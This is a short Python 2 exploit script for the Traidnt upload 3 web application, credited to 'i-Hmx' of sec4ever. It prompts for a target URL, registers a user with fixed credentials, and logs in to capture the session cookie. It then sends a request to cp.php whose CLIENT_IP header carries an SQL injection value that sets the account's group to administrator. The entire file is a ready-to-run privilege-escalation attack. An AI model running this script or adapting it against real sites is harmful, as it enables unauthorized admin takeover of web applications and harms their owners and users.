|
#!/usr/bin/python
import urllib2
import sys
print """
+-------------------------------------------+
| Traidnt upload 3 - Admin add Exploit |
| By i-Hmx |
| sec4ever.com |
| n0p1337@gmail.com |
+-------------------------------------------+"""
target=str(raw_input("[*] Enter Target <http://site.com/path> # "))
print "[+] Adding new user"
try:
register=urllib2.urlopen(target+"/register.php","name=farsawy&email=n0p1337@gmail.com&password=sec4ever&rules=faris rules")
except:
print "[-] Exception happened :("
sys.exit()
print "[+] Grabbing Cookies"
login=urllib2.urlopen(target+"/login.php?do=login","username=farsawy&password=sec4ever")
headers=login.headers.items()
for header in headers:
if header[0]=="set-cookie":
cookies=header[1]
if cookies.find("upload_sid")==-1:
print "[-] Exploitation Failed"
sys.exit()
print "[+] Upgrading privelages"
req=urllib2.Request(target+"/cp.php",headers={"Cookie":cookies,"CLIENT_IP":"1337',`group`='1"})
upgrade=urllib2.urlopen(req)
print "[+] Login with the following data\n + User : farsawy\n + pass : sec4ever\n + Probably you are an admin now ;)"
sys.exit()
|